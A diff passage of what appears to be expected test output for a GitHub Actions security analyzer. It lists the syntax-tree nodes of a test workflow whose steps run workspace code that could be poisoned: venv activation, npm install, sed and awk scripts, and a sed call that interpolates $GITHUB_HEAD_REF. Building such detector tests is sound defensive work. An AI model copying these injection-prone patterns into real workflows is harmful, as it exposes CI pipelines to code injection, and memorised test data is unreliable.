.github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | @@ -344,94 +377,138 @@ parentNodes | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | -| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed 